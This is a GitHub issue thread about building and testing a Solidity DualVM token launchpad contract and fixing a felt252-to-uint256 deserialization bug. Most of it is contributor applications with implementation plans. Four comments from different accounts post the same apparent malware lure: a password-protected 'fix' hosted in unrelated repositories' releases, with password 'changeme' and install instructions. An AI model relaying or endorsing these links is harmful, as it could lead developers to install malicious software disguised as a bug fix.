### ISSUE TITLE
Pump DualVM Solidity contract

### ISSUE THREAD

**Issue by MSghais** [AFK-AlignedFamKernel/afk_monorepo#86]
## Description

We already have a Solidity DualVm contract: LaunchpadPumpDualVM
https://github.com/AFK-AlignedFamKernel/afk_monorepo/blob/95d302756a1e5d6630fda1888f961f44b6d30116/onchain/solidity_contracts/src/launchpad/LaunchpadPumpDualVM.sol#L1

DualVM test are located here:
https://github.com/AFK-AlignedFamKernel/afk_monorepo/blob/95d302756a1e5d6630fda1888f961f44b6d30116/onchain/tests/PumpDualVM.test.ts#L31

We have an issue when converting felt252 into uint256:
Deserialization error in the Cairo contract for the name and symbol parameters when creating a token.

- [ ] Fix felt252 conversion in 
- [ ] Continue to test and fix others bug find etc.
- [ ] Function to create_token
- [ ] create_and_launch_token
- [ ] Buy_token(quote_amount)
- [ ] Sell_token(quote_amount)
- [ ] Add liquidity when threshold_liquidity is reached for the pool (to Uniswap V2)
- [ ] Admin: set quote token
- [ ] Write test with Foundry

**Comment by SoarinSkySagar** [comment]
I am applying to this issue via [OnlyDust platform](https://app.onlydust.com/p/afk---aligned-fam-kernel).

### My background and how it can be leveraged
I am a blockchain developer with a year of experience up my sleeve. I have worked with and created many dapps on Ethereum, Solana and Starknet chains and have also contributed to such dapps. I also have experience writing smart contracts in languages like Solidity, Vyper, Move, Rust, Cairo and Noir.

### How I plan on tackling this issue
I would implement the contract in the following manner:
1. Write the functions for the create_token, create_and_launch_token,  buy_token(quote_amount) and sell_token(quote_amount)
2. When the threshold_liquidity is reached for the pool, add liquidity to the token
3. An owner only function to set quote token
4. Write tests with foundry

## ETA: 3-4 days

**Comment by telfaw** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/aravinda-gamage/x86_64-win64-ranlib/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by telfaw** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/aravinda-gamage/x86_64-win64-ranlib/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by 64dB0y** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by robykartis** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by DrParadox05** [comment]
I am applying to this issue via [OnlyDust platform](https://app.onlydust.com/p/afk---aligned-fam-kernel).

### My background and how it can be leveraged
Hey, can I work on this?

**Comment by Kishan-Vyas** [comment]
I am applying to this issue via [OnlyDust platform](https://app.onlydust.com/p/afk---aligned-fam-kernel).

### My background and how it can be leveraged
i have strong foundation on TypeScript, JavaScript and i have worked with smartcontract which is writen in solidity

**Comment by Sravya-212** [comment]
I am applying to this issue via [OnlyDust platform](https://app.onlydust.com/p/afk---aligned-fam-kernel).

### My background and how it can be leveraged
I have almost an year experience in developing solidity contracts, my expertise stands in creating DApps, DeFi platforms. I have developed a ChatApp, Google Drive3.0, a staking token app. As an experienced Smart Contracts developer in Ethereum and Solana I am confident that I can solve this issue using my Cairo and Solidity skills with seamless interaction with the other functionalities.

### How I plan on tackling this issue
Here is my approach for building the Pump.sol contract:

#Set Up the Contract:
-Utilize OpenZeppelin libraries for ERC20 functionality to ensure secure and standardized token management.
-Define contract parameters, including the quote_token and liquidity threshold, which will be essential for buying, selling, and adding liquidity.

#Implement Core Functions:
-create_token: This function will mint a new ERC20 token based on the specified parameters.
-create_and_launch_token: Combines the token creation process with the launch setup, ensuring the token is ready for trading.
-buy_token(quote_amount): Facilitates token purchases by users, converting a specified amount of the quote_token into the new token.
-sell_token(quote_amount): Enables users to sell their tokens, receiving a specified amount of the quote_token in return.
-add_liquidity: Automatically adds liquidity to Uniswap V2 when the liquidity threshold is reached, using the token and quote_token.

#Admin Functions:
-set_quote_token: Allows the admin to set or update the quote_token used for transactions.

Testing:
-Write comprehensive tests using Foundry to validate each function's correctness. Ensure scenarios like token creation, buying, selling, and liquidity addition are thoroughly tested.

**Comment by 0xJeanmi** [comment]
I am applying to this issue via [OnlyDust platform](https://app.onlydust.com/p/afk---aligned-fam-kernel).

### My background and how it can be leveraged
I'm full stack developer with experience in languages like PHP, JS, TS and Frameworks like React, Laravel. Also, I made several courses in Alchemy University to be prepared to challenges in web3 like this one. So I hope to move forward in this application.

### How I plan on tackling this issue
Well, basically I'll review the examples of .sol contracts in the /launchpad and will write the new features that you required, make the tests and make the PR. Hope to have news from you soon. Thanks!

**Comment by ikemHood** [comment]
Hello @MSghais , I would love to close this out. ETA 48hrs

**Comment by llamitaOnfire** [comment]
I am applying to this issue via [OnlyDust platform](https://app.onlydust.com/p/afk---aligned-fam-kernel).

### My background and how it can be leveraged
Hi! I’m a Computer Engineering student with a growing interest in smart contracts and decentralized finance. Although I’m new to contributing to open source, I’m eager to apply my knowledge and help with this task. 

### How I plan on tackling this issue
Plan for Tackling the Issue:

1. Create the Pump.sol Contract:

Location: The Pump.sol contract will be created in the /launchpad directory, as specified in the project structure.

Functionality:

create_token:
This function will initialize a new token with essential parameters such as name, symbol, and initial supply.
It will handle the deployment and setup of the token contract, ensuring that it conforms to the ERC20 standard.
create_and_launch_token:
This function will encompass the logic to both create a new token and immediately launch it.
It will handle the setup of any initial configurations required for the token to be active and tradable.
Buy_token(quote_amount):
Implement a function to facilitate the purchase of tokens using a specified amount of quote currency.
This function will interact with the token’s contract to transfer tokens to the buyer and handle the quote currency conversion or exchange.
Sell_token(quote_amount):
This function will handle the sale of tokens, allowing users to sell their tokens in exchange for a specified amount of quote currency.
It will include mechanisms to ensure proper token transfer and quote currency handling.
Add Liquidity:
Develop functionality to automatically add liquidity to Uniswap V2 when the threshold_liquidity is reached.
This will involve interacting with Uniswap’s router contract to ensure liquidity is provided to the pool efficiently.
Admin Functionality:
Include a function for the admin to set or update the quote token, allowing for flexibility in managing the token sale and liquidity provisions.
2. Reference launchpad.cairo:

Review and Analyze:
Examine the launchpad.cairo file for any relevant logic, patterns, or structures that might be applicable to the Pump.sol contract.
Ensure that any pertinent aspects of the existing launchpad.cairo logic are considered to maintain consistency and integration within the broader system.
3. Write Tests with Foundry:

Develop Comprehensive Tests:
Utilize Foundry to create a suite of tests that cover all functionalities of the Pump.sol contract.
This will include unit tests to verify the correctness of individual functions (e.g., token creation, buying/selling tokens) and integration tests to ensure that the contract works as intended within the entire ecosystem.
Test Scenarios:
Token Creation: Test scenarios to validate that new tokens are created correctly with appropriate parameters.
Buying Tokens: Ensure that tokens can be purchased with the specified quote amount and verify that balances are updated accurately.
Selling Tokens: Verify that tokens can be sold and that the exchange of tokens for quote currency works as expected.
Liquidity Addition: Test the functionality of adding liquidity to Uniswap V2, ensuring that the contract correctly interacts with the Uniswap protocol when the threshold is met.
Admin Operations: Validate the admin’s ability to set or update the quote token and ensure that such changes are reflected correctly in the contract’s operations.
By following this detailed plan, I aim to deliver a robust Pump.sol contract with comprehensive functionality and reliability. I’m excited to contribute to the project and look forward to your feedback and collaboration.

**Comment by michojekunle** [comment]
I am applying to this issue via [OnlyDust platform](https://app.onlydust.com/p/afk---aligned-fam-kernel).

### My background and how it can be leveraged
I come from a solid background in frontend development and smart contract development, which gives me a unique blend of skills to tackle both UI/UX and the underlying blockchain infrastructure. I've had hands-on experience working with decentralized applications (dApps), integrating smart contracts, and optimizing performance for seamless user interactions.

While this will be my first time contributing to this space, I’m confident my skills in creating intuitive designs and writing optimized smart contracts will bring value. I’m always eager to learn and stay up-to-date with the latest tech trends, which will help me contribute effectively to the project.

### How I plan on tackling this issue
When building the Pump.sol launchpad, my focus would be on creating a gas-optimized and highly efficient architecture.

Core Contract Structure:
ERC20 Factory Pattern
The plan is to implement an ERC20 factory pattern for easy token creation. This way, every project can generate its own token effortlessly. I'll use OpenZeppelin’s battle-tested token templates to ensure security and reliability.

Upgradeable Proxy Pattern
To future-proof the system, I’ll incorporate an upgradeable proxy pattern. This ensures we can roll out updates without breaking existing functionality—super useful for long-term maintenance!

Key Functions:
create_token():
I’ll deploy minimal ERC20 proxy clones using the EIP-1167 standard. This is a gas-efficient way to create new tokens while reusing logic from the original contract.

create_and_launch_token():
This will combine token creation and automated market maker (AMM) pool initialization in one seamless flow.

buy_token()/sell_token():
These functions will implement the classic x*y=k formula for AMMs, with built-in slippage protection to avoid nasty surprises during trades.

Liquidity Addition:
Liquidity will be automatically added when a certain threshold is met, triggering an automated market-making process.

Integration:
Uniswap V2 Router:
I'll integrate the Uniswap V2 Router for liquidity provisioning, allowing the contract to interact with popular decentralized exchanges.

WETH Wrapper:
For Ethereum compatibility, I’ll implement a WETH wrapper, making sure the contract handles ETH and ERC20 tokens smoothly.

Security Measures:
Reentrancy Guards:
I'll apply reentrancy guards on all state-changing functions to block malicious reentrancy attacks.

Checks-Effects-Interactions Pattern:
Following the checks-effects-interactions pattern throughout the contract ensures we don’t leave the contract vulnerable to reentrancy attacks.

Formal Verification:
For extra security, I’ll use formal verification to validate the critical paths in the contract logic.

Gas Optimization:
Assembly Code:
For core calculations, I’ll strategically use assembly code to minimize gas consumption, as this allows for ultra-efficient, low-level optimizations.

Packed Storage:
I'll use packed storage slots to keep state variables organized, ensuring gas is saved when reading and writing data.

Calldata Over Memory:
Wherever applicable, I’ll use calldata instead of memory to pass data, which significantly reduces gas usage.

Testing and Deployment:
Foundry Test Suite:
Testing is crucial, so I’ll create a comprehensive test suite in Foundry. This will include fuzz testing and invariant testing to cover edge cases.

Hardhat for Deployment:
I’ll rely on Hardhat for deployment scripting and network management—it’s reliable and developer-friendly.

Tenderly for Monitoring:
Post-deployment, I’ll use Tenderly for monitoring and troubleshooting any issues that arise.

Admin Controls:
Role-Based Access Control (RBAC):
Admin functions will be managed using Role-Based Access Control (RBAC) to restrict access and prevent unauthorized changes.

Multi-sig Wallet Integration:
For critical operations, I’ll integrate a multi-signature wallet. This ensures that multiple trusted parties must approve high-stakes transactions.

**Comment by harshupanghal** [comment]
I am applying to this issue via [OnlyDust platform](https://app.onlydust.com/p/afk---aligned-fam-kernel).

### My background and how it can be leveraged
I have 2 years of experience of building smart contracts using solidity , I have written 10+ optimized smart contracts for clients and personal projects. I have good understanding of blockchain core concepts.

### How I plan on tackling this issue
I will take reference of launchpad.cairo to develop the smart contract by keeing in mind about less gas fees and more optimized smart contract.

**Comment by Dev-AndresGR** [comment]
I am applying to this issue via [OnlyDust platform](https://app.onlydust.com/p/afk---aligned-fam-kernel).

### My background and how it can be leveraged
I have no background in onlydust, but I am capable of working as a team and hard enough to be able to solve and contribute.

### How I plan on tackling this issue
Reading documentation, asking colleagues and doing trial and error until optimizing the problem

**Comment by Dev-AndresGR** [comment]
I am applying to this issue via [OnlyDust platform](https://app.onlydust.com/p/afk---aligned-fam-kernel).

### My background and how it can be leveraged
Cuéntenos sobre su experiencia y cómo se puede aprovechar:

Tengo una sólida experiencia en el desarrollo de Solidity y la implementación de contratos inteligentes, habiendo trabajado en varios proyectos que involucraban la creación de tokens y la gestión de liquidez. Por ejemplo, he desarrollado e implementado varios tokens ERC-20, he implementado tokenomics y lo he integrado con Uniswap V2 para la gestión de liquidez. En un proyecto, creé un contrato inteligente que permitía a los usuarios acuñar e intercambiar tokens, y lo integré con Uniswap para garantizar que se mantuviera y estuviera accesible la liquidez. Mi experiencia con Foundry para probar contratos inteligentes también significa que puedo escribir pruebas integrales para garantizar la confiabilidad y seguridad del contrato.

### How I plan on tackling this issue
To tackle the Pump.sol contract issue, here’s my approach:

Contract Development: I’d start by examining the launchpad.cairo to understand the functionality and structure required. Based on this, I would implement the Pump.sol contract with the following functions:

create_token: This function will initialize a new ERC-20 token with specific parameters.
create_and_launch_token: This will handle the creation and initial distribution of the token.
buy_token(quote_amount): This function will allow users to purchase tokens with a specified amount of quote token.
sell_token(quote_amount): This function will enable users to sell tokens and receive quote tokens.
Liquidity Management: For managing liquidity, I’d integrate the contract with Uniswap V2. I’ll add logic to automatically add liquidity to the Uniswap pool when the threshold_liquidity is reached. This involves interacting with Uniswap’s smart contracts to ensure that the pool is adequately funded.

Admin Functions: The set_quote_token function will allow the admin to configure which token is used for transactions. This requires careful implementation to ensure that only authorized users can change this setting.

Testing: I’ll write tests using Foundry to cover all aspects of the contract, including:

Token creation and launching
Buying and selling functionality
Liquidity management
Admin functions
By systematically developing and testing each component, I’ll ensure that the Pump.sol contract is robust and functional. I’ll also keep documentation and comments up-to-date to make the code easy to understand and maintain.

**Comment by gregemax** [comment]
I am applying to this issue via [OnlyDust platform](https://app.onlydust.com/p/afk---aligned-fam-kernel).

### My background and how it can be leveraged
I have a background in computer science with a focus on blockchain technology and smart contract development. I have experience working with Solidity and Ethereum, having developed and deployed several ERC20 tokens and decentralized applications. Additionally, I am familiar with testing frameworks like Foundry and Truffle, which ensures robust contract functionality. My experience with DeFi protocols gives me insight into liquidity management and user interactions in these ecosystems. 

### How I plan on tackling this issue
My approach would start with thoroughly understanding the project requirements and existing codebase. I would begin by outlining the necessary functions in the Pump.sol contract, focusing on user interactions like token creation, purchasing, selling, and liquidity management.

I would ensure to implement robust security practices, including input validation and proper access controls. Next, I would set up a testing environment using Foundry to create unit tests for each function, ensuring that all edge cases are covered. I would also consider potential interactions with Uniswap V2 for liquidity provisio

**Comment by chetanck03** [comment]
I am applying to this issue via [OnlyDust platform](https://app.onlydust.com/p/afk---aligned-fam-kernel).

### My background and how it can be leveraged
I have experience in Solidity, building ERC-20 tokens, and working with DeFi platforms like Uniswap. I’ve also written tests using Foundry and understand smart contract security well.

### How I plan on tackling this issue
Create Token: Use OpenZeppelin to make an ERC-20 token.
Launch Token: Combine token creation and launch for trading.
Buy/Sell Tokens: Use Uniswap V2 to handle token trades (buy/sell).
Add Liquidity: Automatically add liquidity to Uniswap when a threshold is met.
Admin Functions: Allow only the admin to set important parameters.
Testing: Use Foundry to test all key functions like creating, buying/selling tokens, and liquidity management.
Security: Ensure safety against common attacks like reentrancy and frontrunning.

**Comment by saimeunt** [comment]
I am applying to this issue via [OnlyDust platform](https://app.onlydust.com/p/afk---aligned-fam-kernel).

### My background and how it can be leveraged
I have experience both in Solidity and Cairo testing.

### How I plan on tackling this issue
I will carefully read and understand the current test suite and implement all the necessary coverage needed as well as fix the problem regarding felt252/uint256 conversion.

**Comment by Luluameh** [comment]
I am applying to this issue via [OnlyDust platform](https://app.onlydust.com/p/afk---aligned-fam-kernel).

### My background and how it can be leveraged
I have a strong background in web application development, particularly in building complex user interfaces and integrating backend services. My experience with TypeScript, React, and TanStack Query allows me to efficiently manage state and asynchronous data fetching from backend APIs. I have previously worked on systems where real-time data was crucial, such as e-commerce platforms handling orders, user accounts, and payment statuses. This experience would be directly applicable in creating a launchpad for token statistics, user holdings, and other key blockchain-related data, ensuring smooth data integration and user experience.

My familiarity with APIs and creating RESTful services would allow me to integrate the existing backend endpoints seamlessly, ensuring that data like stats, supply, symbol, liquidity raised, and user-specific token information are presented clearly in the UI. Additionally, I’ve worked on projects that involve real-time data updating, managing complex state, and ensuring scalability, which is essential when dealing with token distribution and statistics in a launchpad environment.

### How I plan on tackling this issue
I would approach this problem by breaking it down into several steps:

Understanding the Backend Endpoints: Start by reviewing the existing backend API documentation to fully understand the endpoints (e.g., deploy, deploy-launch, holdings, token_stats, etc.). I would make test calls to these endpoints using a tool like Postman to verify data structures and any possible discrepancies.

Setting up TanStack Query for Data Fetching: Integrate TanStack Query for all asynchronous calls to the backend. This would allow for efficient caching, background fetching, and error handling. I’d set up queries for each endpoint: token_stats, deploy, holdings, and others. Using TanStack Query's features like retries and refetch intervals ensures the data displayed is always fresh.

Designing and Building the UI:

LaunchpadComponent: This would serve as the container for all the token statistics, user holdings, and actions like deployment. The UI would display information such as token stats (name, symbol, supply, threshold), liquidity raised, and individual user holdings.
TokenLaunchCard: This component would focus on a specific token’s details and allow the user to interact with it (e.g., see how much they hold, access transaction history).
The UI would also include visual elements like graphs or progress bars to show stats like liquidity raised or token distribution. I would prioritize making the data intuitive and easy to navigate, using components such as tables and charts for user holdings and transaction history.

UI Integration: I would wire up all existing endpoints and map the data from the backend to the UI. For example:

deploy/:token would provide deployment details for a specific token.
holdings would return all user token holdings, aggregated across users.
token_stats would give details like total supply, distribution, and thresholds, which I would display in a stats card on the Launchpad.
Testing and Debugging: After building the basic integration, I would conduct thorough testing, including unit and integration tests, to ensure all data is fetched and displayed correctly. Additionally, I would focus on edge cases like what happens if an endpoint fails or returns incomplete data.

By structuring the solution this way, I can ensure a reliable and responsive launchpad UI that leverages backend data effectively.

**Comment by DanielEmmanuel1** [comment]
I am applying to this issue via [OnlyDust platform](https://app.onlydust.com/p/afk---aligned-fam-kernel).

### My background and how it can be leveraged
Good day AFK Team My name is Deon and I'd like to apply formally for the task presented. I am a Web and blockchain engineer with a passion for building user interfaces and Dapps that deliver meaningful experiences. With a background in Computer Science (BSc) and hands-on experience, If given the chance to contribute this will be my third official and highly meaningful contribution via onlydust. I am confident in my ability to deliver on the feature you're looking for and excited to contribute.

### How I plan on tackling this issue
I will begin by analyzing the code related to the felt252 to uint256 conversion in the Cairo contract, particularly within the create_token and create_and_launch_token functions.

The deserialization error appears to be linked to the name and symbol parameters. I will closely examine how these parameters are being handled during token creation and identify why the felt252 values are not being properly converted.

I will then implement or refactor the conversion logic to properly handle the deserialization of felt252 into uint256. This may require adjusting the contract’s serialization/deserialization mechanisms to ensure that values like name and symbol can be accurately parsed.

Finally I will ensure that this fix is seamlessly integrated into all relevant parts of the contract, especially functions such as create_token, create_and_launch_token, and any other areas where token metadata is managed.

After implementing these fixes, I will conduct extensive testing, focusing on the functions mentioned:

create_token
buy_token(quote_amount)
sell_token(quote_amount)
add_liquidity when threshold_liquidity is reached for the pool (in Uniswap V2)and will check for any additional issues that might arise during testing, especially those related to Uniswap interactions, liquidity thresholds, and token creation, identify any bugs and immediately fix them to ensure that the contract behaves as expected across all scenarios.

After running the test I’ll verify and review admin-related operations, particularly focusing on the set_quote_token function. Since this function might also involve felt252 values, I will ensure that it correctly handles felt252-to-uint256 conversions. This will include ensuring that admin rights are preserved and that token parameters such as the quote token are set without causing deserialization issues.

Finally I will write detailed unit and integration tests using Foundry, ensuring that all the core functions are thoroughly validated:

Felt252 to uint256 conversion: Test that the conversion is functioning correctly across all relevant functions.

Token creation and launch: Validate that tokens can be created, named, and symbolized properly without errors.

Buying/selling tokens: Ensure the buy_token and sell_token functions operate correctly, accounting for proper conversions and transfers.

Liquidity threshold handling: Test the contract's interaction with Uniswap V2, especially once the liquidity pool threshold is met.

Admin operations: Test the admin’s ability to set the quote token and ensure all other admin functions are working as intended.
